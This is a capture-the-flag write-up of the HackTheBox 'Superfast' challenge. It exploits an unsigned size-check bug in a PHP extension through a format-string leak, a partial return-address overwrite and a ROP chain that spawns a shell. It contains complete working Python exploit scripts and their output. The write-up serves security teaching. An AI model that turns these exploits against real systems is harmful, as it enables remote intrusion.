Superfast (HackTheBox)

Hey folks. In this write-up, we're going to discuss the Superfast challenge on HackTheBox, which was part of the HackTheBox Business CTF 2022. We're going to perform a single-byte overwrite to bypass ASLR, leak stack pointers, and build a Return Oriented Programming (ROP) chain. The description of the challenge is:

We've tracked connections made from an infected workstation back to this server. We believe it is running a C2 checkin interface, the source code of which we acquired from a temporarily exposed Git repository several months ago. Apparently the engineers behind it are obsessed with speed, extending their programs with low-level code. We think in their search for speed they might have cut some corners - can you find a way in?

I really enjoyed pwning this challenge since it has a unique and quite realistic target which I haven't seen before in CTFs.

Index

  • First looks
  • Finding primitives
  • Developing the ROP chain
  • Retrieving the flag

First looks

We're given a PHP file with a shared object (.so) written in C, and we're given a source directory for the shared object.

.
├── build_docker.sh
├── challenge
│   ├── index.php
│   ├── php_logger.so
│   └── start.sh
├── Dockerfile
└── src
    ├── build.sh
    ├── config.m4
    ├── php_logger.c
    └── php_logger.h

2 directories, 9 files

Directories given with the challenge

In /challenge/start.sh we can see that the challenge code gets bootstrapped using:

#!/bin/sh
while true; do php -dextension=/php_logger.so -S 0.0.0.0:1337; done

The content of start.sh

We can see that PHP loads php_logger.so as a binary extension for the webserver.

Finding primitives

To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact, like teamwork.

Analysing index.php

The content of index.php (below) checks for a header called Cmd-Key and a parameter cmd.

<?php
if (isset($_SERVER['HTTP_CMD_KEY']) && isset($_GET['cmd'])) {
	$key = intval($_SERVER['HTTP_CMD_KEY']);
	if ($key <= 0 || $key > 255) {
		http_response_code(400);
	} else {
		log_cmd($_GET['cmd'], $key);
	}
} else {
	http_response_code(400);
}

Content of index.php

One of the most important stages of exploit development is building a reproducible environment. Since I want to run GDB on php_logger.so, I will run the challenge without Docker. I can serve index.php by running php -dextension=./php_logger.so -S 0.0.0.0:1337 in /challenge/, and send the HTTP request using curl 'http://127.0.0.1:1337/index.php?cmd=123' -H 'Cmd-Key: 123'. We can see it succeeds because it returns a 200 status code.

[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 Accepted
[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 [200]: GET /?cmd=123
[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 Closing

Verbose output of the PHP webserver

Regarding functionality, we can see that index.php calls log_cmd($cmd, $key) with 0 < $key < 256.

Analyzing php_logger.so

We can find the source code of php_logger.so in /src/php_logger.c, which also contains the source code of log_cmd(). We can see that log_cmd() retrieves its function arguments using zend_parse_parameters(). Then, it calls decrypt($cmd, $cmdlen, $key) and - if the return value is valid - appends the result to the /tmp/log file.

PHP_FUNCTION(log_cmd) {
    char* input;
    zend_string* res;
    size_t size;
    long key;
    if (zend_parse_parameters(ZEND_NUM_ARGS(), "sl", &input, &size, &key) == FAILURE) {
        RETURN_NULL();
    }
    res = decrypt(input, size, (uint8_t)key);
    if (!res) {
        print_message("Invalid input provided\n");
    } else {
        FILE* f = fopen("/tmp/log", "a");
        fwrite(ZSTR_VAL(res), ZSTR_LEN(res), 1, f);
        fclose(f);
    }
    RETURN_NULL();
}

Source code of log_cmd()

This function looks safe on its own, so the vulnerability must be in decrypt(input, size, key). This function checks whether the size of the command is less than the size of the stack buffer. If it is more, it returns NULL, but if it is less, it will memcpy() the input into the buffer and XOR the buffer with the key.

zend_string* decrypt(char* buf, size_t size, uint8_t key) {
    char buffer[64] = {0};
    if (sizeof(buffer) - size > 0) {
        memcpy(buffer, buf, size);
    } else {
        return NULL;
    }
    for (int i = 0; i < sizeof(buffer) - 1; i++) {
        buffer[i] ^= key;
    }
    return zend_string_init(buffer, strlen(buffer), 0);
}

Source code of decrypt()
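To make the XOR behaviour concrete, here is a small Python model of decrypt(). It is only a sketch: decrypt_model is a hypothetical name, and it deliberately models only inputs that fit in the zero-initialised 64-byte buffer (the overflow is ignored). It shows two details that matter later on: only the first 63 bytes are XORed, and strlen() stops at the first null byte.

```python
BUFFER_SIZE = 64  # sizeof(buffer) in decrypt()


def decrypt_model(data: bytes, key: int) -> bytes:
    """Model decrypt() for inputs that fit in the buffer (no overflow modelled)."""
    if len(data) >= BUFFER_SIZE:
        raise ValueError("this sketch only models inputs shorter than the buffer")
    # char buffer[64] = {0}; memcpy(buffer, buf, size);
    buffer = bytearray(BUFFER_SIZE)
    buffer[:len(data)] = data
    # The loop runs while i < sizeof(buffer) - 1, so byte 63 is never XORed.
    for i in range(BUFFER_SIZE - 1):
        buffer[i] ^= key
    # zend_string_init(buffer, strlen(buffer), 0): cut at the first null byte.
    end = buffer.find(0)
    return bytes(buffer) if end == -1 else bytes(buffer[:end])


# Pre-XORing the input with the key makes the intended bytes land in the buffer.
key = 4
fmt = b"%llx_%llx_"
pre_xored = bytes(c ^ key for c in fmt)
print(decrypt_model(pre_xored, key)[:len(fmt)])
```

Two consequences follow from the model: whatever we want the buffer to contain has to be XORed with the key before sending, and an input byte equal to the key turns into a null byte that cuts the string short.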

We can see that sizeof(buffer) - size > 0 is used for the size check. However, sizeof() yields a size_t, which is an unsigned type (typically an unsigned int on 32-bit and, in this case, an unsigned long on 64-bit), and size is a size_t as well. The subtraction is therefore done entirely in unsigned arithmetic, which means the result wraps around instead of becoming negative. For example, (unsigned int)0 - (int)1 would become 2**32-1 instead of -1. A practical example is the program below, whose output is 4294967295 1.

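#include <stdio.h>

int main()
{
    unsigned int a = 5;
    int b = 6;

    /* b is converted to unsigned int, so a - b wraps around to 2**32 - 1 */
    printf("%u %d", a - b, a - b > 0);
    return 0;
}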

Demo of interaction between (unsigned) integers

That means that sizeof(buffer) - size > 0 is always true, unless sizeof(buffer) == size. The result is a buffer overflow on the stack, which we can leverage for a control flow hijacking primitive. Using Ghidra - the reverse engineering suite developed by the NSA - we can see that the offset from the buffer to the return address on the stack is 0x98 (152) bytes.

Stack variable offsets in Ghidra
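The broken size check can also be modelled in a few lines of Python. This is a sketch under the assumption of a 64-bit build (so size_t is 64 bits wide); size_check_passes is a hypothetical helper name, and the modulo stands in for C's unsigned wrap-around.

```python
SIZE_T_BITS = 64  # assumption: 64-bit build, so size_t is 64 bits wide
BUFFER_SIZE = 64  # sizeof(buffer) in decrypt()


def size_check_passes(size: int) -> bool:
    """Model `sizeof(buffer) - size > 0` with unsigned wrap-around."""
    difference = (BUFFER_SIZE - size) % (1 << SIZE_T_BITS)
    return difference > 0


for size in (1, 63, 64, 65, 200):
    print(size, size_check_passes(size))
```

Only size == 64 is rejected. Every larger size passes the check and ends up in memcpy().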

However, ASLR is enabled. That means that we cannot guess the library's memory address and hence cannot guess a return address for control flow hijacking. Still, the lowest 12 bits of an address are not randomized, and thus we can reliably overwrite them. Say our normal return address would be 0x555555559a1e; in the next run of the program it could be 0x55555123fa1e, but the 0xa1e at the end doesn't change, because it's the lowest 12 bits.

The reason the lowest 12 bits of the address don't change is that they are the offset within a page, and a page is 4096 (2 ** 12) bytes. The kernel - the manager of ASLR - maps memory at page granularity, so it can only randomize the page-aligned part of an address.

Sadly, we can only write bundles of 8 bits (1 byte) at a time considering we're working with a char data type. This means we could only overwrite the 0x1e part of the addresses listed above, which narrows our possible return address area.
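The arithmetic behind this can be checked quickly in Python. The sketch below uses the two example addresses from above; page_offset and one_byte_window are hypothetical helper names.

```python
from typing import Tuple

PAGE_SIZE = 4096  # 2 ** 12 bytes


def page_offset(address: int) -> int:
    """Return the low 12 bits, which ASLR leaves untouched."""
    return address & (PAGE_SIZE - 1)


def one_byte_window(return_address: int) -> Tuple[int, int]:
    """Range of addresses reachable by overwriting only the lowest byte."""
    low = return_address & ~0xFF
    return low, low | 0xFF


print(hex(page_offset(0x555555559A1E)), hex(page_offset(0x55555123FA1E)))
print([hex(a) for a in one_byte_window(0x555555559A1E)])
```

Both example addresses share the page offset 0xa1e, and a single-byte overwrite can only move the return address within a 256-byte window around the original one.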

In Ghidra, we can figure out that the return address from decrypt() to log_cmd() (without ASLR) is equal to 0x101429. This means our scope of possible return addresses ranges from 0x101400 to 0x1014ff.

      0010141e 48 89 ce     MOV       param_2,RCX
      00101421 48 89 c7     MOV       param_1,RAX
      00101424 e8 07 fc     CALL      decrypt
               ff ff
      00101429 48 89 44     MOV       qword ptr [RSP + local_10],RAX
               24 38
      0010142e 48 83 7c     CMP       qword ptr [RSP + local_10],0x0
               24 38 00

The code in our return scope is the following. We can see that decrypt() is called, followed by either print_message() or a handful of file I/O functions. Internally, print_message() is a wrapper for php_printf(): the printf() function in PHP. This is interesting because it outputs to the HTTP response body, which means that we can leak pointers.

    *(undefined4 *)(param_2 + 8) = 1;
  }
  else {
    iVar1 = decrypt(local_20,local_28,(size_t *)(local_30 & 0xff),local_28,(size_t)inlen);
    local_10 = CONCAT44(extraout_var,iVar1);
    if (local_10 == 0) {
      print_message("Invalid input provided\n");
    }
    else {
      local_18 = fopen("/tmp/log","a");
      fwrite((void *)(local_10 + 0x18),*(size_t *)(local_10 + 0x10),1,local_18);
      fclose(local_18);
    }
    *(undefined4 *)(param_2 + 8) = 1;
  }
  return;
}

C decompilation of our return scope 

However, in order to leak pointers with print_message(), we need to set the RDI register to the printf format string. Fortunately, the RDI register is set to the input argument of decrypt(char* buf, size_t size, uint8_t key) at 0x101390.

      00101385 48 8b 84     MOV       RAX,qword ptr [RSP + local_18]
               24 a0 00 
               00 00
      0010138d 48 89 c6     MOV       inputlen,RAX
      00101390 48 89 cf     MOV       input,param_4
      00101393 e8 e8 fc     CALL      <EXTERNAL>::memcpy
               ff ff
      00101398 48 8b 54     MOV       key,qword ptr [RSP + local_58]
               24 60

Assembly code which moves the input into the RDI register

When I try to fuzz using a script, I receive the following output:

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@\x81\xd5\x84U\x80~

Fuzzing output

from pwn import xor
import requests

xorkey = 1

s = requests.session()
headers = {"cmd-key": str(xorkey)}

# offset = 152 
payload = b"A"*152 + b"\x40"
content = s.get(b"http://127.0.0.1:1337?cmd="+payload, headers=headers).content
print(xor(content, xorkey))

Script used to fuzz

However, when we remove the xor() function call, we can see that the response ends with what looks like an address: b'A\x80\xd4\x85T\x81\x7f'. Using print(hex(u64(content[63:].ljust(8, b'\x00')))) we can translate it to 0x7f815485d48041. Note that the lowest byte (0x41) appears to be the last 'A' of our padding rather than part of the pointer, since the slice starts at index 63. In order to identify where this leak points, we can start a GDB server. In that session we leak 0x7f651305f54041, and with vmmap (in pwndbg) we can see that the pointer (0x7f651305f540 without the padding byte) falls under 0x7f6513000000 0x7f6513200000 rw-p 200000 0 [anon_7f6513000]. Since this region isn't executable, it's irrelevant for the ROP chain.

from pwn import xor, gdb, u64
import requests
import time

gdb.debug(args=['php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')
time.sleep(5)

xorkey = 1

s = requests.session()
headers = {"cmd-key": str(xorkey)}

payload = b"A"*152 + b"\x40"
content = s.get(b"http://127.0.0.1:1337?cmd="+payload, headers=headers).content
print(hex(u64(content[63:].ljust(8, b'\x00'))))

time.sleep(999)

Script for debugging using GDB
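For readers without pwntools at hand, the u64() conversion can be reproduced with the standard library. This is a sketch: unpack_leak is a hypothetical helper, and treating the first byte of the slice as padding is my reading of the response layout, not something the binary guarantees.

```python
import struct


def unpack_leak(tail: bytes) -> int:
    """Interpret up to 8 leaked bytes as a little-endian 64-bit integer."""
    return struct.unpack("<Q", tail[:8].ljust(8, b"\x00"))[0]


tail = b"A\x80\xd4\x85T\x81\x7f"   # response bytes from index 63 onwards
with_padding = unpack_leak(tail)     # still includes the leading 'A' (0x41)
pointer = unpack_leak(tail[1:])      # assumption: the first byte is padding
print(hex(with_padding), hex(pointer))
```

Slicing from index 64 instead of 63 would give the 6-byte pointer directly.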

Since that is useless, we need to find another way to leak addresses. To do that, we can utilize the fact that we're calling printf(). By supplying a payload like %08x %08x %08x %08x we can leak the stack. By trial and error, I found out that we can leak the stack, php_logger.so and the PHP binary using the format string %llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_. Using the following payload, we can see the following leaks:

php @ 0x55c720a64000
php_logger.so @ 0x7f609866e000
stack @ 0x7fff10fbd480

Output of the script

#!/usr/bin/env python3

from pwn import xor, u64, gdb
import requests
import time

gdb.debug(args=['php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')

time.sleep(3)

xorkey = 0x4
s = requests.session()
headers = {"cmd-key": str(xorkey)}

fmt = b'%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_'
payload = xor(fmt + b"A"*(152 - len(fmt)), xorkey) + b"\x40"
url = b"http://127.1:1337/index.php?cmd=" + payload
print(url)

content = s.get(url, headers=headers).content
addresses = content.split(b"_")

php_base = int(addresses[5], 16)-0x55e240
logger_base = int(addresses[8], 16)-0x1445
stack = int(addresses[0], 16)

print("php @", hex(php_base))
print("php_logger.so @", hex(logger_base))
print("stack @", hex(stack))

time.sleep(999)

Payload for leaking addresses
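The parsing step can be isolated into a small function that is testable without a running target. This is a sketch: parse_leaks is a hypothetical name, the field indices and offsets are the ones from the script above, and the sample response is synthetic (constructed from the base addresses printed above, with the unused fields set to 0), not a captured one.

```python
from typing import Dict

# Offsets of the leaked pointers relative to their module base (from the script).
PHP_LEAK_OFFSET = 0x55E240
LOGGER_LEAK_OFFSET = 0x1445


def parse_leaks(content: bytes) -> Dict[str, int]:
    """Split the '%llx_' output and turn the leaked pointers into base addresses."""
    fields = content.split(b"_")
    leaks = {
        "stack": int(fields[0], 16),
        "php": int(fields[5], 16) - PHP_LEAK_OFFSET,
        "php_logger.so": int(fields[8], 16) - LOGGER_LEAK_OFFSET,
    }
    # Sanity check: module base addresses must be page aligned.
    for name in ("php", "php_logger.so"):
        if leaks[name] & 0xFFF:
            raise ValueError(f"{name} base {leaks[name]:#x} is not page aligned")
    return leaks


# Synthetic response, built to match the base addresses shown above.
sample = b"7fff10fbd480_0_0_0_0_55c720fc2240_0_0_7f609866f445_"
for name, address in parse_leaks(sample).items():
    print(name, "@", hex(address))
```

The page-alignment check is a cheap way to notice when the offsets don't match the PHP build on the target, which would otherwise only show up as a crashing ROP chain.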

We have the needed primitives, so we can develop the ROP chain.

Developing the ROP chain

Now we can use pwntools' ELF and ROP classes to generate ROP chains automatically. Using pwntools' ELF class, we can see that the execl function is present in the PLT section of the php binary. This means we can use it to spawn a shell. Our strategy is:

  1. Leaking the address of the PHP binary and the php_logger.so in memory.
  2. dup2(4, N) to set stdin, stdout and stderr file descriptors to the TCP connection file descriptor for the webserver.
  3. execl("/bin/sh", "/bin/sh", 0) to spawn the /bin/sh executable

We can generate a ROP chain automatically with pwntools:

rop = ROP(php)

'''
fd[0]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[1]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[2]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[3]      tcp 0.0.0.0:1337 => 0.0.0.0:0 (listen)
fd[4]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
'''

# set connection socket to stdin/stdout/stderr
rop.call('dup2', [4, 0])
rop.call('dup2', [4, 1])
rop.call('dup2', [4, 2])

binsh = next(php.search(b"/bin/sh\x00"))

rop.call('execl', [binsh, binsh, 0])
print(rop.dump())

Python code for generating the ROP chain

Which gives the following ROP chain:

0x0000:   0x56244b60816b pop rdi; ret
0x0008:              0x4 [arg0] rdi = 4
0x0010:   0x56244b6043fc pop rsi; ret
0x0018:              0x0 [arg1] rsi = 0
0x0020:   0x56244b601be0 dup2
0x0028:   0x56244b60816b pop rdi; ret
0x0030:              0x4 [arg0] rdi = 4
0x0038:   0x56244b6043fc pop rsi; ret
0x0040:              0x1 [arg1] rsi = 1
0x0048:   0x56244b601be0 dup2
0x0050:   0x56244b60816b pop rdi; ret
0x0058:              0x4 [arg0] rdi = 4
0x0060:   0x56244b6043fc pop rsi; ret
0x0068:              0x2 [arg1] rsi = 2
0x0070:   0x56244b601be0 dup2
0x0078:   0x56244b60816b pop rdi; ret
0x0080:   0x56244bd03fc3 [arg0] rdi = 94713890750403
0x0088:   0x56244b60487c pop rdx; ret
0x0090:              0x0 [arg2] rdx = 0
0x0098:   0x56244b6043fc pop rsi; ret
0x00a0:   0x56244bd03fc3 [arg1] rsi = 94713890750403
0x00a8:   0x56244b6042d0 execl

ROP chain generated by pwntools

As we can see, it does the following:

dup2(4, 0)
dup2(4, 1)
dup2(4, 2)
execl("/bin/sh", "/bin/sh", 0)

C representation of the ROP chain
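To see what pwntools does under the hood, the same layout can be packed by hand with the standard library. This is only a sketch: build_chain is a hypothetical helper, and the gadget addresses are copied from the dump above, so they are valid for that single run only.

```python
import struct
from typing import Dict, List


def build_chain(gadgets: Dict[str, int], binsh: int, sock_fd: int = 4) -> bytes:
    """Pack dup2(sock_fd, 0..2) followed by execl(binsh, binsh, 0) as 64-bit words."""
    words: List[int] = []
    for target_fd in (0, 1, 2):
        # rdi = sock_fd, rsi = target_fd, then call dup2
        words += [gadgets["pop_rdi"], sock_fd,
                  gadgets["pop_rsi"], target_fd,
                  gadgets["dup2"]]
    # rdi = "/bin/sh", rdx = 0, rsi = "/bin/sh", then call execl
    words += [gadgets["pop_rdi"], binsh,
              gadgets["pop_rdx"], 0,
              gadgets["pop_rsi"], binsh,
              gadgets["execl"]]
    return b"".join(struct.pack("<Q", word) for word in words)


# Addresses taken from the dump above (they change on every run because of ASLR).
gadgets = {
    "pop_rdi": 0x56244B60816B,
    "pop_rsi": 0x56244B6043FC,
    "pop_rdx": 0x56244B60487C,
    "dup2": 0x56244B601BE0,
    "execl": 0x56244B6042D0,
}
chain = build_chain(gadgets, binsh=0x56244BD03FC3)
print(hex(len(chain)))
```

The chain is 0xb0 bytes long, which matches the dump: the last entry (execl) sits at offset 0xa8.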

Retrieving the flag

I coded the following script to utilize the ROP chain. If we run this, we get a shell on the box.

#!/usr/bin/env python3

from pwn import xor, u64, gdb, ELF, p64, remote, ROP, context
import requests
import time
import urllib.parse

#gdb.debug(args=['/usr/bin/php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')
#time.sleep(5)

target_ip = b"161.35.173.232"
target_port = b"31302"

target_host = b"http://" + target_ip + b":" + target_port

s = requests.session()
headers = {"cmd-key": "1"}

fmt = b'%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_'
payload = xor(fmt + b"A"*(152 - len(fmt)), 1) + b"\x40"

print("[*] sending payload...")
content = s.get(target_host + b"/index.php?cmd=" + payload, headers=headers).content
addresses = content.split(b"_")

print("[*] loading addresses...")
# set context for ROP()
#context.binary = php = ELF('/usr/bin/php', checksec=False)
context.binary = php = ELF('./php', checksec=False)
php.address = int(addresses[5], 16) - php.sym.executor_globals

php_logger = ELF('pwn_superfast/challenge/php_logger.so', checksec=False)
php_logger.address = int(addresses[8], 16)-0x1445
stack = int(addresses[0], 16)

print("[+] php @", hex(php.address))
print("[+] php_logger.so @", hex(php_logger.address))
print("[+] stack @", hex(stack))

rop = ROP(php)

'''
fd[0]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[1]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[2]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[3]      tcp 0.0.0.0:1337 => 0.0.0.0:0 (listen)
fd[4]      tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
'''

# set connection socket to stdin/stdout/stderr
rop.call('dup2', [4, 0])
rop.call('dup2', [4, 1])
rop.call('dup2', [4, 2])

binsh = next(php.search(b"/bin/sh\x00"))

rop.call('execl', [binsh, binsh, 0])
print(rop.dump())

payload = b'A'*152 + rop.chain()
http = "GET /index.php?cmd=" + urllib.parse.quote(payload) + " HTTP/1.1\n"
http += "Cmd-Key: 1\n\n"

print("[*] sending payload for shell...")
p = remote(target_ip, int(target_port))
p.send(http.encode())
p.interactive()

time.sleep(999)

Python script for retrieving the flag
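The raw HTTP request is built by hand because the payload contains arbitrary bytes, including null bytes from the packed addresses. The sketch below isolates that step; build_request is a hypothetical helper, and unlike the script above it uses CRLF line endings, which is what the HTTP specification asks for (the plain "\n" version worked against the PHP development server as well). Like the script, it sends no Host header.

```python
from urllib.parse import quote, unquote_to_bytes


def build_request(payload: bytes, key: int = 1) -> bytes:
    """Percent-encode the raw payload and wrap it in a minimal GET request."""
    query = quote(payload, safe="")  # encode every reserved or non-ASCII byte
    request = f"GET /index.php?cmd={query} HTTP/1.1\r\n"
    request += f"Cmd-Key: {key}\r\n\r\n"
    return request.encode("ascii")


# Example: padding followed by one packed 64-bit value containing null bytes.
payload = b"A" * 152 + (0x4).to_bytes(8, "little")
request = build_request(payload)
print(request[:40])
```

Percent-encoding keeps the request line pure ASCII, and the server decodes the parameter back into the original bytes before it reaches log_cmd().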

$ python3 script.py
[*] sending payload...
[*] loading addresses...
[+] php @ 0x55da3ce00000
[+] php_logger.so @ 0x7fb906c50000
[+] stack @ 0x7ffee56eddc0
[*] Loaded 327 cached gadgets for './php'
0x0000:   0x55da3d00816b pop rdi; ret
0x0008:              0x4 [arg0] rdi = 4
0x0010:   0x55da3d0043fc pop rsi; ret
0x0018:              0x0 [arg1] rsi = 0
0x0020:   0x55da3d001be0 dup2
0x0028:   0x55da3d00816b pop rdi; ret
0x0030:              0x4 [arg0] rdi = 4
0x0038:   0x55da3d0043fc pop rsi; ret
0x0040:              0x1 [arg1] rsi = 1
0x0048:   0x55da3d001be0 dup2
0x0050:   0x55da3d00816b pop rdi; ret
0x0058:              0x4 [arg0] rdi = 4
0x0060:   0x55da3d0043fc pop rsi; ret
0x0068:              0x2 [arg1] rsi = 2
0x0070:   0x55da3d001be0 dup2
0x0078:   0x55da3d00816b pop rdi; ret
0x0080:   0x55da3d703fc3 [arg0] rdi = 94395821998019
0x0088:   0x55da3d00487c pop rdx; ret
0x0090:              0x0 [arg2] rdx = 0
0x0098:   0x55da3d0043fc pop rsi; ret
0x00a0:   0x55da3d703fc3 [arg1] rsi = 94395821998019
0x00a8:   0x55da3d0042d0 execl
[*] sending payload for shell...
[+] Opening connection to b'161.35.173.232' on port 31302: Done
[*] Switching to interactive mode
sh: turning off NDELAY mode
$ whoami
ctf

Output of the exploit

Thanks for reading my write-up about the HackTheBox Business CTF 2022 Superfast challenge; I hope you learned as much as I did.